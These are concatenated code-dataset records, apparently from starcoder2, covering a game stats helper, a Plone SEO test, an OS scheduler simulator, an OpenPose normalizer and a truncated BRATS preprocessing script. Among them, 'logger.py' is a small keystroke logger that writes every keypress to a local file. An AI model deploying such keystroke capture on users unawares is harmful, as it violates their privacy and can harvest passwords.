update_stats(name):\n check_empty()\n with open('stats', 'r') as f:\n loaded_stats = json.load(f)\n loaded_stats[name] = loaded_stats.get(name, 0) + 1\n encoded_stats = json.JSONEncoder().encode(loaded_stats)\n with open('stats', 'w') as f:\n f.write(encoded_stats)\n\n\ndef center(value):\n return str(value).center(15)\n\n\ndef make_stars(n):\n return '*'*n\n\n\ndef print_stats():\n check_empty()\n with open('stats', 'r') as f:\n loaded_stats = json.load(f)\n print()\n\n for name, count in sorted(loaded_stats.items(), key=lambda item: item[1], reverse=True):\n name_text = f\"==> Total {name} wins:\".rjust(23)\n print(f\"{name_text} {count} | {make_stars(count)}\")\n print('\\n')\n\n\ndef clear_stats():\n with open('stats', 'w') as f:\n f.write('{\"Bot\": 0, \"Human\": 0}')\n","sub_path":"game_stats.py","file_name":"game_stats.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"72536539","text":"import re\nfrom base import getToolByName, FunctionalTestCase, newSecurityManager\nfrom config import *\n\nclass TestExposeDCMetaTags(FunctionalTestCase):\n\n def afterSetUp(self):\n self.qi = self.portal.portal_quickinstaller\n self.sp = self.portal.portal_properties.site_properties\n self.qi.installProduct(PROJECT_NAME)\n self.basic_auth = 'portal_manager:secret'\n uf = self.app.acl_users\n uf.userFolderAddUser('portal_manager', 'secret', ['Manager'], [])\n user = uf.getUserById('portal_manager')\n if not hasattr(user, 'aq_base'):\n user = user.__of__(uf)\n newSecurityManager(None, user)\n\n '''Preparation for functional testing'''\n self.my_doc = self.portal.invokeFactory('Document', id='my_doc')\n self.my_doc = self.portal['my_doc']\n\n def test_exposeDCMetaTags_in_configletOn(self):\n path = self.portal.id+'/@@seo-controlpanel?exposeDCMetaTags=True&form.submitted=1'\n self.publish(path, self.basic_auth)\n self.assert_(self.sp.exposeDCMetaTags)\n\n def test_exposeDCMetaTags_in_configletOff(self):\n self.publish(self.portal.id+'/@@seo-controlpanel?form.submitted=1', self.basic_auth)\n self.assert_(not self.sp.exposeDCMetaTags)\n\n def test_exposeDCMetaTagsPropertyOff(self):\n self.sp.manage_changeProperties(exposeDCMetaTags = False)\n self.html = str(self.publish(self.portal.id+'/my_doc', self.basic_auth))\n m1 = re.match('.*', self.html, re.S|re.M)\n if not m1:\n m1 = re.match('.*', self.html, re.S|re.M)\n m2 = re.match('.*', self.html, re.S|re.M)\n if not m2:\n m2 = re.match('.*', self.html, re.S|re.M)\n m = m1 or m2\n self.assert_(not m, 'DC meta tags avaliable when exposeDCMetaTags=False')\n\n def test_exposeDCMetaTagsPropertyOn(self):\n self.sp.manage_changeProperties(exposeDCMetaTags = True)\n self.html = str(self.publish(self.portal.id+'/my_doc', self.basic_auth))\n m1 = re.match('.*', self.html, re.S|re.M)\n if not m1:\n m1 = re.match('.*', self.html, re.S|re.M)\n m2 = re.match('.*', self.html, re.S|re.M)\n if not m2:\n m2 = re.match('.*', self.html, re.S|re.M)\n m = m1 and m2\n self.assert_(m, 'DC meta tags not avaliable when createManager=True')\n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n suite.addTest(makeSuite(TestExposeDCMetaTags))\n return suite\n","sub_path":"quintagroup.seoptimizer/tags/2.2.0/quintagroup/seoptimizer/tests/testQSEOptimizerExposeDCMetaTags.py","file_name":"testQSEOptimizerExposeDCMetaTags.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"602225970","text":"#!/usr/bin/python\n\nimport keylogger\n\nimport os\n\nif __name__ == \"__main__\":\n file_dir = os.path.dirname(os.path.abspath(__file__))\n done = lambda: False\n f = open(os.path.join(file_dir, \"keystrokes.log\"), \"a\")\n def log(time, modifiers, keys):\n f.write(\"{},{},{}\\n\".format(time, modifiers, keys))\n keylogger.log(done, log)\n","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"279431555","text":"import os\nimport sys\n\n\n#plan=criar_PcbTabela('/home/andre/Documentos/plan.txt')\nTempo=0\n#Program_Counter=-1\nPcbTabela=[]\nProntos=[]\nBloqueados=[]\nRunningState=None\nTerminados=[]\nMemory=[]\nTime_Quantum=20\n\n#--------------- Instruction ----------------\nclass Instruction:\n def __init__(self,pro,ins,n,nome):\n self.pro=pro\n self.ins=ins\n self.n=n\n self.nome=nome\n#-------------- Instruction -------------------\n\n#------------- PCB ---------------------------\nclass PCB:\n def __init__(self,pid,pai,start,pc,prioridade,estado,tamanho,burst,inicio,fim,arrival):\n self.pid=pid\n self.pai=pai\n self.filho=[]\n self.start=start\n self.pc=pc\n self.prioridade=prioridade\n self.estado=estado\n self.tamanho=tamanho\n self.burst=burst\n self.inicio=inicio\n self.fim=fim\n self.arrival=arrival\n#------------- PCB ---------------------------\n\n#--------------Alterar o PCB------------------\ndef alterar_Pcb(pcb):#OK\n for i in range(len(PcbTabela)):\n a=PcbTabela[i]\n if(a.pid==pcb.pid):\n PcbTabela[i]=pcb\n break\n#--------------Alterar o PCB------------------\n\ndef prioridade():\n global RunningState\n global Bloqueados\n global Prontos\n if(RunningState==None):\n if(len(Prontos)==0):\n flag=fim()\n if(flag==0):\n return 1\n if flag==2:\n for i in range(len(Bloqueados)):\n a=Bloqueados[i]\n if(a.pai==0):\n a.estado=1\n Prontos.append(a)\n alterar_Pcb(a)\n Bloqueados.pop(i)\n break\n quem_RunningState()\n instrucao=Memory[(RunningState.pc)]\n validacao2(realizar_instrucao(instrucao))\n return 0\n return 0\n else:\n quem_RunningState()\n instrucao=Memory[(RunningState.pc)]\n validacao2(realizar_instrucao(instrucao))\n return 0\n else:\n quem_RunningState()\n instrucao=Memory[(RunningState.pc)]\n validacao2(realizar_instrucao(instrucao))\n return 0\n\n#--------------------Realizar as instruçoes------------------------\ndef realizar_instrucao(instrucao):\n global RunningState\n global Memory \n global PcbTabela \n global Bloqueados \n global Terminados\n global Tempo #6\n if((instrucao.ins)=='M'):\n print(\"Execução---> %d %c %d %s\" % (instrucao.pro,instrucao.ins,instrucao.n,instrucao.nome))\n if(running_tamanho()==0):\n return 0\n return 1 #14\n elif((instrucao.ins)=='A'):\n print(\"Execução---> %d %c %d %s\" % (instrucao.pro,instrucao.ins,instrucao.n,instrucao.nome))\n if(running_tamanho()==0):\n return 0\n return 1 #20\n elif((instrucao.ins)=='S'):\n print(\"Execução---> %d %c %d %s\" % (instrucao.pro,instrucao.ins,instrucao.n,instrucao.nome))\n if(running_tamanho()==0):\n return 0\n return 1 #26\n elif((instrucao.ins)=='C'):\n print(\"Execução---> %d %c %d %s\" % (instrucao.pro,instrucao.ins,instrucao.n,instrucao.nome))\n inst=Memory[(RunningState.pc) +1]\n print(\"Execução---> %d %c %d %s\" % (inst.pro,inst.ins,inst.n,inst.nome)) \n aux=RunningState\n #----------------------------------\n s=\"/home/andre/Documentos/\"+inst.nome+\".txt\"\n comeco=len(Memory)\n tam=preencher_memoria(s,len(PcbTabela)+1)\n a=PCB(len(PcbTabela)+1,RunningState.pid,comeco,comeco,RunningState.prioridade,2,tam,tam,-1,-1,-1)\n aux.filho.append(a.pid)\n alterar_Pcb(aux)\n PcbTabela.append(a)\n Bloqueados.append(a)\n #print(\"Ola10\")\n ppid=os.fork()\n #print(\"Ola11\") \n if(ppid==0):\n #print(\"Ola12\")\n processos_concorrentes2(a.pid)\n #print(\"Ola13\")\n os._exit(0)\n else:\n #print(\"Ola14\")\n os.waitpid(ppid,0)\n #print(\"Ola15\")\n #exit()\n #----------------------------------\n #print(\"Ola16\")\n RunningState=aux\n RunningState.tamanho=RunningState.tamanho-2\n RunningState.pc=RunningState.pc+2\n alterar_Pcb(RunningState) #54\n if((Tempo%Time_Quantum)!=0):\n return 0 \n else:\n if(RunningState.tamanho !=0):\n return 0\n return 1 #60\n else:\n #---------------------------------\n aux=RunningState\n if((len(RunningState.filho)) !=0):\n for i in RunningState.filho:\n for j in PcbTabela:\n if(j.pid==i and j.estado !=4):\n #print(\"OLA1\")\n pidd=os.fork() #70\n #print(\"OLA2\")\n if(pidd==0):\n #print(\"OLA3\")\n processos_concorrentes2(j.pid)\n #print(\"OLA4\")\n else:\n os.waitpid(pidd,0)\n exit()\n #print(\"OLA5\")\n if((Tempo%Time_Quantum)==0):\n break\n if((Tempo%Time_Quantum)==0):\n break\n RunningState=aux\n #---------------------------------\n if((Tempo%Time_Quantum)==0):\n return 0 #return especial\n print(\"Execução---> %d %c %d %s\" % (instrucao.pro,instrucao.ins,instrucao.n,instrucao.nome))\n RunningState.tamanho=0\n alterar_Pcb(RunningState)\n Tempo=Tempo+1 \n return 1\n ## Ver melhor esta parte\n#--------------------Realizar as instruçoes------------------------\n\n\n#------------------Quem no RunningState----------4\ndef quem_RunningState():\n global Prontos\n global RunningState\n aux=(0,-1)\n for i in range(len(Prontos)):\n if(aux[1]>Prontos[i].prioridade or aux[1]==-1):\n x=i\n y=Prontos[i].prioridade\n aux=(x,y)\n if(RunningState!=None):\n if(RunningState.pid !=Prontos[aux[0]].pid):\n aux2=RunningState\n RunningState=Prontos[aux[0]]\n RunningState.estado=3\n if(RunningState.inicio==-1):\n RunningState.inicio=Tempo\n alterar_Pcb(RunningState)\n aux2.estado=1\n alterar_Pcb(aux2)\n else:\n if(aux[1]!=-1):\n RunningState=Prontos[aux[0]]\n RunningState.estado=3\n if(RunningState.inicio==-1):\n RunningState.inicio=Tempo\n alterar_Pcb(RunningState)\n\ndef quem_RunningState2():\n global Prontos\n global RunningState\n aux=(0,-1)\n for i in range(len(Prontos)):\n if(aux[1]>Prontos[i].prioridade or aux[1]==-1):\n x=i\n y=Prontos[i].prioridade\n aux=(x,y)\n return (Prontos[aux[0]].pid)\n\ndef processos_concorrentes2(pid):#OK\n global RunningState\n global Bloqueados\n global Memory\n global Tempo\n global Time_Quantum\n for i in Bloqueados:\n if(i.pid==pid and i.estado!=4):\n RunningState=i\n RunningState.estado=3\n alterar_Pcb(RunningState)\n break\n while(True):\n verificar_arrival()\n if((Tempo%Time_Quantum)==0):# caso o Tempo corresponde ao Time_Quantum\n RunningState.estado=2\n alterar_Pcb(RunningState)\n Bloqueados.append(RunningState)\n break\n else:\n #aux=RunningState\n #print(\"*****\")\n #print(RunningState.pid)\n pid=quem_RunningState2()\n #print(pid)\n #print(\"/////\")\n #print(RunningState.pid)\n #RunningState=aux\n if(RunningState.pai!=pid):\n #print(\"trocar\")\n RunningState.estado=2\n alterar_Pcb(RunningState)\n Bloqueados.append(RunningState)\n break\n instrucao=Memory[RunningState.pc]\n resultado=realizar_instrucao(instrucao)\n #print(\"resultado\")\n #print(resultado)\n validacao2(resultado)\n if(resultado==1):\n print(\"Final no processo_concorrentes\")\n break\n\ndef running_tamanho():#OK\n global RunningState\n global Tempo\n RunningState.tamanho=RunningState.tamanho-1\n if(RunningState.tamanho!=0):\n RunningState.pc=RunningState.pc+1\n alterar_Pcb(RunningState)\n Tempo=Tempo+1\n return 0\n alterar_Pcb(RunningState)\n Tempo=Tempo+1\n return 1\n\ndef validacao2(resultado):\n global RunningState\n global Prontos\n if(resultado==1):\n RunningState.estado=4\n RunningState.fim=Tempo\n Terminados.append(RunningState.pid)\n alterar_Pcb(RunningState)\n for i in range(len(Prontos)):\n if(Prontos[i].pid==RunningState.pid):\n Prontos.pop(i)\n break\n RunningState=None\n\n#---------------Colocar o processo na fila Prontos ---------\ndef verificar_arrival():#OK\n global Tempo\n global PcbTabela\n global Prontos\n for i in PcbTabela:\n if(i.estado==0 and i.pai==0):\n if(i.arrival==Tempo):\n i.estado=1\n alterar_Pcb(i)\n Prontos.append(i)\n#---------------Colocar o processo na fila Prontos ---------\n\n#-------------- O processo ja executaram ------------\ndef fim():#OK\n global PcValuebTabela\n global Bloqueados\n global Tempo\n flag=0\n for i in PcbTabela:\n if(i.tamanho!=0 and i.pai==0):\n flag=1\n break\n if flag==1:\n if(len(Bloqueados)!=0):\n for i in Bloqueados:\n if(i.pai==0):\n return 2 #existe nos bloquedo\n Tempo= Tempo + 1\n return 1\n else:\n print(\"fim\")\n return 0 # já nao existe mais nada para correr\n#-------------- O processo ja executaram ------------\n\n\n#------------ Funçao para ler o ficheiro plan.txt-----------\ndef read_file_plan(nome):#OK\n file=open(nome,\"r\")\n lines=file.readlines()\n fila=[]\n for i in lines:\n a=i.strip()\n b=a.split(\",\")\n fila.append(b)\n return fila\n#------------ Funçao para ler o ficheiro plan.txt-----------\n\n#----------- Preencher a memoria------------------\ndef preencher_memoria(nome,index):#OK\n global Memory\n file=open(nome,\"r\")\n lines=file.readlines()\n for i in lines:\n a=i.strip()\n b=a.split(\" \")\n if b[0]=='L':\n c=Instruction(index,b[0],0,b[1])\n elif b[0]=='T':\n c=Instruction(index,b[0],0,None)\n else:\n z=int(b[1])\n c=Instruction(index,b[0],z,None)\n Memory.append(c)\n return (len(lines))\n#----------- Preencher a memoria------------------\n\n#.---------- Criar PcbTabela ---------------------\ndef criar_PcbTabela(nome):#OK\n global PcbTabela\n fila=read_file_plan(nome)\n aux=0\n for i in range(len(fila)):\n array=fila[i]\n string=array[0]\n tam=preencher_memoria(string,i+1)\n z=int(array[2])\n zz=int(array[1])\n a=PCB(i+1,0,aux,aux,z,0,tam,tam,-1,-1,zz)\n PcbTabela.append(a)\n aux=tam+aux\n return fila\n#.---------- Criar PcbTabela ---------------------\n\ndef main():\n global Tempo\n global Time_Quantum\n global RunningState\n global Bloqueados\n global Prontos\n global Terminados\n control=read_file_plan('/home/andre/Documentos/control.txt')\n plan=criar_PcbTabela('/home/andre/Documentos/plan.txt')\n #plan=criar_PcbTabela('/home/andre/Documentos/plan2.txt')\n flag=0\n pode=0\n while(len(control)!=0):\n cont=control.pop(0)\n if(cont[0]==\"E\"):\n while((Tempo%Time_Quantum)!=0 or pode==0):\n pode=1\n print(Tempo)\n verificar_arrival()\n final=prioridade()\n if((final)==1):\n flag=1\n break\n pode=0\n elif(cont[0]==\"I\"):\n if(RunningState != None):\n RunningState.estado=2\n alterar_Pcb(RunningState)\n Bloqueados.append(RunningState)\n RunningState=None\n elif(cont[0]==\"D\"):\n for i in range(len(Bloqueados)):\n a=Bloqueados[i]\n if(a.pai==0):\n a.estado=1\n Prontos.append(a)\n alterar_Pcb(a)\n Bloqueados.pop(i)\n break\n elif(cont[0]==\"R\"):\n print(\"Tempo-> %d\" % Tempo)\n if(RunningState != None):\n print(\"Execução-> %d\" % RunningState.pid)\n else:\n print(\"Execução-> None\")\n for i in range(len(Bloqueados)):\n a=Bloqueados[i]\n if(a.pai==0):\n print(\"Bloqueado-> %d\" % a.pid)\n for i in range(len(Prontos)):\n a=Prontos[i]\n print(\"Prontos a executar-> %d\" % a.pid)\n for i in range(len(Terminados)):\n print(\"Terminados-> %d\" % Terminados[i])\n else:\n while(True):\n print(Tempo)\n verificar_arrival()\n final=prioridade()\n if(final==1):\n flag=1\n break\n if(flag==0):\n while(True):\n #print(\"1001\")\n verificar_arrival()\n #print(\"1002\")\n final=prioridade()\n #print(\"1003\")\n if(final==1):\n flag=1\n break\n listaf=[]\n for i in PcbTabela:\n listai=[]\n if(i.pai==0):\n #print(\"pid\")\n #print(i.pid)\n #print(\"i.inicio\")\n #print(i.inicio)\n #print(\"i.fim\")\n #print(i.fim)\n #print(\"i.burst\")\n #print(i.burst)\n tat=i.fim-i.arrival\n #print(\"tat\")\n #print(tat)\n wt=tat-i.burst\n #print(\"wt\")\n #print(wt)\n #rt=i.inicio-i.arrival\n listai.append(tat)\n listai.append(wt)\n #listai.append(rt)\n listaf.append(listai)\n for i in listaf:\n for j in i:\n #print(i)\n print(j)\n\n\n\"\"\"\ndef main():\n global Tempo\n global Time_Quantum\n global RunningState\n global Bloqueados\n global Prontos\n global Terminados\n control=read_file_plan('/home/andre/Documentos/control.txt')\n plan=criar_PcbTabela('/home/andre/Documentos/plan.txt')\n while(True):\n if(RunningState==None):\n print(RunningState)\n else:\n print(RunningState.pid)\n verificar_arrival()\n final=prioridade()\n if((final)==1):\n break\n\"\"\"\nmain()\n","sub_path":"simulador2.py","file_name":"simulador2.py","file_ext":"py","file_size_in_byte":15141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"372033779","text":"\"\"\"normalize_slow.py: normalize json files in a folder\nCopy json data from folder_name to folder_name_normalized\nWork in the fodler folder_name_normalized\nGet x/y_mean and x/y_stddev for whole folder and write it into a dictionary\nuse the dictionary to normalize the values\nwrite normalized values into json file in folder_name_normalized\n\nsame functions as normalize_slow.py, but copying files on-the-fly without a save copy beforehand\n\"\"\"\n\nimport json\nimport time\n\nimport numpy as np\nimport os\nimport statistics\nfrom distutils.dir_util import copy_tree\nfrom pathlib import Path\nimport sys\n\n\nclass Normalize:\n\n def __init__(self, path_to_json_dir):\n self.path_to_json = path_to_json_dir\n\n def main_normalize(self):\n print(\"Start to copy files...\")\n # self.copy_files()\n self.normalize()\n\n def copy_files(self):\n # copy\n os.walk(self.path_to_json)\n subdirectories = [x[1] for x in os.walk(self.path_to_json)]\n data_folder = Path(self.path_to_json)\n # if there are folders with \"_normalized\" dont copy them again\n subdirectories_copy = [s for s in subdirectories[0] if \"_normalized\" not in s]\n for subdir in subdirectories_copy:\n if not os.path.exists(data_folder / str(subdir + \"_normalized\")):\n os.makedirs(data_folder / str(subdir + \"_normalized\"))\n copy_tree(str(data_folder / subdir), str(data_folder / str(subdir + \"_normalized\")))\n\n print(\"Copied files from %s to %s\" % (\n str(data_folder / subdir), str(data_folder / str(subdir + \"_normalized\"))))\n\n def normalize(self):\n # copy\n os.walk(self.path_to_json)\n subdirectories = [x[1] for x in os.walk(self.path_to_json)]\n data_folder = Path(self.path_to_json)\n # if there are folders with \"_normalized\" dont copy them again\n subdirectories_copy = [s for s in subdirectories[0] if \"_normalized\" not in s]\n for subdir in subdirectories_copy:\n if not os.path.exists(data_folder / str(subdir + \"_normalized\")):\n os.makedirs(data_folder / str(subdir + \"_normalized\"))\n # copy_tree(str(data_folder / subdir), str(data_folder / str(subdir + \"_normalized\")))\n\n print(\"Copied files from %s to %s\" % (\n str(data_folder / subdir), str(data_folder / str(subdir + \"_normalized\"))))\n\n # used keys of openpose here\n keys = ['pose_keypoints_2d', 'face_keypoints_2d', 'hand_left_keypoints_2d', 'hand_right_keypoints_2d']\n folder_mean_stddev = {'pose_keypoints_2d': [], 'face_keypoints_2d': [], 'hand_left_keypoints_2d': [],\n 'hand_right_keypoints_2d': []}\n all_mean_stddev = {}\n\n # work\n os.walk(self.path_to_json)\n subdirectories = [x[1] for x in os.walk(self.path_to_json)]\n data_folder = Path(self.path_to_json)\n # if there are folders with \"_normalized\" use em for working directories\n subdirectories_work = [s for s in subdirectories[0] if \"_normalized\" in s]\n\n # get mean and stddev of whole folder and write it into a dictionary\n # the dictionary contains for each key the mean and stddev for x and y of the whole folder:\n # folder_name - key - 0 - 0: array of x_mean\n # folder_name - key - 0 - 1: array of x_stddev\n # folder_name - key - 1 - 0: array of y_mean\n # folder_name - key - 1 - 1: array of y_stddev\n for subdir in subdirectories_copy:\n print(\"Computing mean and stddev for %s\" % (subdir))\n json_files = [pos_json for pos_json in os.listdir(data_folder / subdir)\n if pos_json.endswith('.json')]\n idx = 0\n for k in keys:\n x_all = []\n y_all = []\n x_all_T = []\n y_all_T = []\n for file in json_files:\n # print(file)\n # set file for class\n x, y = self.get_points(data_folder / subdir, file, k)\n\n x_all.append(x)\n y_all.append(y)\n\n x_all_T = np.array(x_all).T.tolist()\n y_all_T = np.array(y_all).T.tolist()\n # print(x_all_T)\n # if idx % 500 == 0:\n # print(\"%s file : %d of %d\" % (file, idx, len(json_files)))\n # idx += 1\n\n # fill dictionary for each folder with y/x_mean, y/x_stddev\n folder_mean_stddev[k] = [self.get_mean_stddev(x_all_T), self.get_mean_stddev(y_all_T)]\n print(folder_mean_stddev)\n # print(folder_mean_stddev)\n all_mean_stddev[subdir] = folder_mean_stddev.copy()\n\n print(\"Computed all mean and stddev. Normalizing...\")\n\n # use mean and stddev from above to compute values for the json files\n for subdir in subdirectories_copy:\n folder_mean_stddev = all_mean_stddev[subdir]\n json_files = [pos_json for pos_json in os.listdir(data_folder / subdir)\n if pos_json.endswith('.json')]\n\n for file in json_files:\n jsonFile = open(data_folder / subdir / file, \"r\") # Open the JSON file for reading\n data = json.load(jsonFile) # Read the JSON into the buffer\n jsonFile.close() # Close the JSON file\n\n # x -> [0::3]\n # y -> [1:.3]\n # c -> [2::3] (confidence)\n for k in keys:\n # x values\n temp_x = data['people'][0][k][0::3]\n temp_y = data['people'][0][k][1::3]\n temp_c = data['people'][0][k][2::3]\n\n # get x values and normalize it\n for index in range(len(temp_x)):\n mean = folder_mean_stddev[k][0][0][index]\n stddev = folder_mean_stddev[k][0][1][index]\n if stddev != 0:\n temp_x[index] = (temp_x[index] - mean) / stddev\n else:\n temp_x[index] = temp_x[index]\n\n # get y values and normalize it\n for index in range(len(temp_y)):\n mean = folder_mean_stddev[k][1][0][index]\n stddev = folder_mean_stddev[k][1][1][index]\n if stddev != 0:\n temp_y[index] = (temp_y[index] - mean) / stddev\n else:\n temp_y[index] = temp_y[index]\n\n # build new array of normalized values\n values = []\n for index in range(len(temp_x)):\n values.append(temp_x[index])\n values.append(temp_y[index])\n values.append(temp_c[index])\n\n # copy the array of normalized values where it came from\n data['people'][0][k] = values\n\n # ## Save our changes to JSON file\n jsonFile = open(data_folder / str(subdir + \"_normalized\") / file, \"w+\")\n jsonFile.write(json.dumps(data))\n jsonFile.close()\n\n def get_points(self, path, file, key):\n temp_df = json.load(open(path / file))\n temp_x_pose = temp_df['people'][0][key][0::3]\n temp_y_pose = temp_df['people'][0][key][1::3]\n return [temp_x_pose, temp_y_pose]\n\n def get_mean_stddev(self, values):\n means = []\n std_devs = []\n for array in values:\n # print(array)\n means.append(np.mean(array))\n std_devs.append(statistics.stdev(array))\n return [means, std_devs]\n\n def compute_normalization(self, values):\n result = []\n for array in values:\n # print(array)\n mean = np.mean(array)\n std_dev = statistics.stdev(array)\n helper_array = []\n for element in array:\n if std_dev != 0:\n helper_array.append((element - mean) / std_dev)\n else:\n helper_array.append(element)\n result.append(helper_array)\n return result\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n path_to_json_dir = sys.argv[1]\n else:\n path_to_json_dir = r\"C:\\Users\\Asdf\\Downloads\\How2Sign_samples\\openpose_output\\json\"\n norm = Normalize(path_to_json_dir)\n start_time = time.time()\n norm.main_normalize()\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n","sub_path":"ma/scripts/20-02-19_normalization/normalize_slow_no_copy.py","file_name":"normalize_slow_no_copy.py","file_ext":"py","file_size_in_byte":8624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"27840570","text":"import tensorlayer as tl\nimport numpy as np\nimport os, csv, random, gc, time, pickle\nimport nibabel as nib\nimport tensorflow as tf\nfrom tensorlayer.layers import *\nfrom google.colab import files\nimport os\nfrom pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\nfrom google.colab import auth\nfrom oauth2client.client import GoogleCredentials\n\nauth.authenticate_user()\ngauth = GoogleAuth()\ngauth.credentials = GoogleCredentials.get_application_default()\ndrive = GoogleDrive(gauth)\n\n# Load the Drive helper and mount\nfrom google.colab import drive as dd\ndd.mount('/content/drive')\n\nfrom googleapiclient.http import MediaFileUpload\nfrom googleapiclient.discovery import build\ndrive_service = build('drive', 'v3')\n\n\n\n\nDATA_SIZE = 'small'\n\nsave_dir = '/data/train_dev_all/'\n\nif not os.path.exists(save_dir):\n os.makedirs(save_dir)\n \nHGG_data_path = \"/content/drive/My Drive/BRATS2018/HGG\"\nLGG_data_path = \"/content/drive/My Drive/BRATS2018/LGG\"\nsurvival_csv_path = \"/content/drive/My Drive/BRATS2018/survival_data.csv\"\n\nsurvival_id_list = []\nsurvival_age_list = []\nsurvival_peroid_list = []\n\nwith open(survival_csv_path, 'r') as f:\n reader = csv.reader(f)\n next(reader)\n for idx, content in enumerate(reader):\n survival_id_list.append(content[0])\n survival_age_list.append(float(content[1]))\n survival_peroid_list.append(float(content[2]))\n\n#print(len(survival_id_list)) #163\n\nif DATA_SIZE == 'all':\n HGG_path_list = tl.files.load_folder_list(path=HGG_data_path)\n LGG_path_list = tl.files.load_folder_list(path=LGG_data_path)\nelif DATA_SIZE == 'half':\n HGG_path_list = tl.files.load_folder_list(path=HGG_data_path)[0:100]# DEBUG WITH SMALL DATA\n LGG_path_list = tl.files.load_folder_list(path=LGG_data_path)[0:30] # DEBUG WITH SMALL DATA\nelif DATA_SIZE == 'small':\n HGG_path_list = tl.files.load_folder_list(path=HGG_data_path)[0:40] # DEBUG WITH SMALL DATA\n LGG_path_list = tl.files.load_folder_list(path=LGG_data_path)[0:0] # DEBUG WITH SMALL DATA\nelse:\n exit(\"Unknow DATA_SIZE\")\n \nprint(\"length of HGG and LGG data list = \",len(HGG_path_list), len(LGG_path_list)) #210 #75\n\nHGG_name_list = [os.path.basename(p) for p in HGG_path_list] #extracting file names\nLGG_name_list = [os.path.basename(p) for p in LGG_path_list]\n\nsurvival_id_from_HGG = [] #used in mean and deviation calculation\nsurvival_id_from_LGG = []\nfor i in survival_id_list: \n if i in HGG_name_list:\n survival_id_from_HGG.append(i)\n elif i in LGG_name_list:\n survival_id_from_LGG.append(i)\n \nprint(len(survival_id_from_HGG), len(survival_id_from_LGG)) #163, 0\n\nindex_HGG = list(range(0, len(survival_id_from_HGG)))\n# index_HGG = []\n# index_LGG = list(range(0, 45))\nindex_LGG = list(range(0, len(survival_id_from_LGG)))\n\nif DATA_SIZE == 'all':\n dev_index_HGG = index_HGG[-84:-42]\n test_index_HGG = index_HGG[-42:]\n tr_index_HGG = index_HGG[:-84]\n dev_index_LGG = index_LGG[-30:-15]\n test_index_LGG = index_LGG[-15:]\n tr_index_LGG = index_LGG[:-30]\nelif DATA_SIZE == 'half':\n dev_index_HGG = index_HGG[-30:] # DEBUG WITH SMALL DATA\n test_index_HGG = index_HGG[-5:]\n tr_index_HGG = index_HGG[:-30]\n dev_index_LGG = index_LGG[-10:] # DEBUG WITH SMALL DATA\n test_index_LGG = index_LGG[-5:]\n tr_index_LGG = index_LGG[:-10]\nelif DATA_SIZE == 'small':\n dev_index_HGG = index_HGG[-5:] # DEBUG WITH SMALL DATA\n test_index_HGG = index_HGG[-10:-5]\n tr_index_HGG = index_HGG[:-10]\n dev_index_LGG = index_LGG[-5:] # DEBUG WITH SMALL DATA\n test_index_LGG = index_LGG[-6:-5]\n tr_index_LGG = index_LGG[:-6]\n \n \nsurvival_id_dev_HGG = [survival_id_from_HGG[i] for i in dev_index_HGG]\nsurvival_id_test_HGG = [survival_id_from_HGG[i] for i in test_index_HGG]\nsurvival_id_tr_HGG = [survival_id_from_HGG[i] for i in tr_index_HGG]\n\nsurvival_id_dev_LGG = [LGG_name_list[i] for i in dev_index_LGG]\nsurvival_id_test_LGG = [LGG_name_list[i] for i in test_index_LGG]\nsurvival_id_tr_LGG = [LGG_name_list[i] for i in tr_index_LGG]\n\nprint(\"survival_id_dev_LGG = \", len(survival_id_dev_LGG), \"survival_id_tr_LGG = \",len(survival_id_tr_LGG))\n\n\n#only of HGG, not of LGG\nsurvival_age_dev = [survival_age_list[survival_id_list.index(i)] for i in survival_id_dev_HGG]\nsurvival_age_test = [survival_age_list[survival_id_list.index(i)] for i in survival_id_test_HGG]\nsurvival_age_tr = [survival_age_list[survival_id_list.index(i)] for i in survival_id_tr_HGG]\n\nsurvival_period_dev = [survival_peroid_list[survival_id_list.index(i)] for i in survival_id_dev_HGG]\nsurvival_period_test = [survival_peroid_list[survival_id_list.index(i)] for i in survival_id_test_HGG]\nsurvival_period_tr = [survival_peroid_list[survival_id_list.index(i)] for i in survival_id_tr_HGG]\n\ndata_types = ['flair', 't2', 't1ce']\ndata_types_mean_std_dict = {i: {'mean': 0.0, 'std': 1.0} for i in data_types}\n\n#==================== LOAD ALL IMAGES' PATH AND COMPUTE MEAN/ STD\nfor i in data_types:\n data_temp_list = []\n for j in survival_id_from_HGG:\n img_path = os.path.join(HGG_data_path, j, j + '_' + i + '.nii.gz')\n img = nib.load(img_path).get_data()\n data_temp_list.append(img)\n\n for j in survival_id_from_LGG:\n img_path = os.path.join(LGG_data_path, j, j + '_' + i + '.nii.gz')\n img = nib.load(img_path).get_data()\n data_temp_list.append(img)\n\n data_temp_list = np.asarray(data_temp_list)\n m = np.mean(data_temp_list)\n s = np.std(data_temp_list)\n data_types_mean_std_dict[i]['mean'] = m\n data_types_mean_std_dict[i]['std'] = s\ndel data_temp_list\n\n\nprint(data_types_mean_std_dict)\n\nwith open(save_dir + 'mean_std_dict.pickle', 'wb') as f:\n pickle.dump(data_types_mean_std_dict, f, protocol=4)\n \n##==================== GET NORMALIZE IMAGES\nX_train_input = []\nX_train_target = []\n# X_train_target_whole = [] # 1 2 4\n# X_train_target_core = [] # 1 4\n# X_train_target_enhance = [] # 4\n\nX_dev_input = []\nX_dev_target = []\n# X_dev_target_whole = [] # 1 2 4\n# X_dev_target_core = [] # 1 4\n# X_dev_target_enhance = [] # 4\n\nprint(\" HGG Validation\")\nfor i in survival_id_dev_HGG:\n print(i)\n all_3d_data = []\n for j in data_types:\n img_path = os.path.join(HGG_data_path, i, i + '_' + j + '.nii.gz')\n img = nib.load(img_path).get_data()\n img = (img - data_types_mean_std_dict[j]['mean']) / data_types_mean_std_dict[j]['std']\n img = img.astype(np.float64)\n all_3d_data.append(img)\n \n seg_path = os.path.join(HGG_data_path, i, i + 